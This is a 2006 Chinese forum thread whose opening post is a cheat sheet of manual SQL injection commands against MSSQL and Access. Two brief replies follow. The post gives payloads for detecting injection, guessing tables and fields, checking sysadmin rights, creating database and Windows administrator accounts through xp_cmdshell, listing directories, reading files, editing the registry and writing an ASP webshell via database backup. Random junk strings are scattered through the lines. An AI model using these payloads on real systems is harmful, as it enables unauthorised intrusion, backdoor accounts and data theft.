社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4798阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 bE_8NA"2  
  2.初步判断是否是mssql ;and user>0 Y,}_LS$f  
7Z6=e6/\  
  3.注入参数是字符'and [查询条件] and ''=' Al-`}g+^  
:>1nkm&Eg  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' ==dKC;  
MET9rT  
  5.判断数据库系统 YMX9Z||  
e}UQN:1  
  ;and (select count(*) from sysobjects)>0 mssql RuPnWx!  
.Kb3VNgwvm  
  ;and (select count(*) from msysobjects)>0 access HuevDy4  
`L'g<VK;  
RxP H[7oZ  
yix[zfQt0  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 BX >L7n  
sey,J5?  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 \vA*dQ-  
hYW9a`Ht/  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 }|DspO  
1t  R^  
  9.(1)猜字段的ascii值(access) !"L.gu-'  
m{/7)2.  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 oW3"J6,S  
m@Z#  
  (2)猜字段的ascii值(mssql) $h#sb4ek  
OEW'bT)  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ETp?RWXX  
uZ+bo&  
  10.测试权限结构(mssql) IzP,)!EE  
:7v'[b  
BQ-x#[ %s  
6_j |@  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--  1MN!  
U2 *ORd  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U+Y(:  
.xRdKt!p  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -YA,Stc-  
0fsVbC  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--  - vvyG  
@-$8)?`q  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- nKx)R^]k  
Tuln#<:  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [9; @1I<x  
UqP{Cyy{  
  ;and 1=(select IS_MEMBER('db_owner'));-- ]\(8d[ 4  
s4|\cY`b-  
7r:h_r-  
|mEWN/@C  
  11.添加mssql和系统的帐户 ,Bk5( e  
]~TsmR[  
  ;exec master.dbo.sp_addlogin username;-- XNz+a|cF  
  ;exec master.dbo.sp_password null,username,password;-- "aJHCi~l  
UL+Txc  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6D;N.wDZ  
SVCh!/qe\  
  ;exec master.dbo.xp_cmdshell 'net user username password MGg(d  
]fyfL|(;  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- w~66G  
y4^u&0}0$  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8 x{Owj:Q  
.biq)L e  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Kj4/fB  
? #K|l*  
]E`<8hRB  
Pe,>ny^J1  
  12.(1)遍历目录 lTx_E#^s  
^m>4<~/  
  ;create table dirs(paths varchar(100), id int) ^6s im2  
c!6D{(sfh  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Itl8#LpLM  
l1+l@r\  
  ;and (select top 1 paths from dirs)>0 f"MID6  
+ :MSY p  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) @Cj!MZ=T  
9[0iIT$q$  
v] m/$X2  
NoI|Dz  
  (2)遍历目录 o4Q?K.9c  
QYH-"-)  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- \nl(tU#j  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 SI7rTJ]/  
3c<aI =$^  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 78& |^sq  
"5hk%T '  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 U&^q#['  
hkMeUxS  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0m@+ &X>w  
-Jd|H*wWo  
)qWwh)\;!  
pKSCC"i&j  
  13.mssql中的存储过程 vW+6_41ZM  
`ecseBn3d  
  xp_regenumvalues 注册表根键, 子键 ({uW-%  
]Ry9{:  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 NRRJlY S  
_7c3=f83  
  xp_regread 根键,子键,键值名 s(,S~  
=ZgueUz,  
  ;exec xp_regread PxkV[ nbS  
JF=R$!5  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 [|]J8o@u^  
{[y6qQm  
  xp_regwrite 根键,子键, 值名, 值类型, 值 5!c/J:z  
v">?`8V  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 1T^WMn:U  
N`8K1{>BH  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9CD ei~  
I Xc `Ec  
  xp_regdeletevalue 根键,子键,值名 0z8(9DlTc  
MB]E[&Q!  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 8lyIL^  
bWe2z~dP  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 w\buQ6pR)  
(.J/Ql0Y  
MO`Y&<g~A  
T.bFB+'E|  
  14.mssql的backup创建webshell J Enjc/  
%cF`x_h[j  
  use model .D*Qu}  
P\U<,f  
  create table cmd(str image); qt8Y3:=8l  
*!5CL'  
  insert into cmd(str) values (''); MAa9JA8kw)  
<A3%1 82  
  backup database model to disk='c:\l.asp'; +=tdgw/  
{oQs*`=l>  
8}QM~&&.  
sW>%mnx  
  15.mssql内置函数 fc#9e9R  
{lI}a8DP  
  ;and (select @@version)>0 获得Windows的版本号 x9lA';})  
AL]gK)R  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa .$U,bE  
~ #jQFyOh  
  ;and (select user_name())>0 爆当前系统的连接用户 H%_^Gy8f  
q"d9C)Md  
  ;and (select db_name())>0 得到当前连接的数据库 8hGyh#  
y_X6{}Ke  
oz!)x\m*H  
`z!AjAT-G  
  16.简洁的webshell z'L0YqXG/  
~Ntk -p  
  use model w{ja*F6  
 _){|/Zd  
  create table cmd(str image); g/GI'8EMj  
y0%@^^-Ru  
  insert into cmd(str) values (''); } z'Jsy[s  
De$~ *2  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五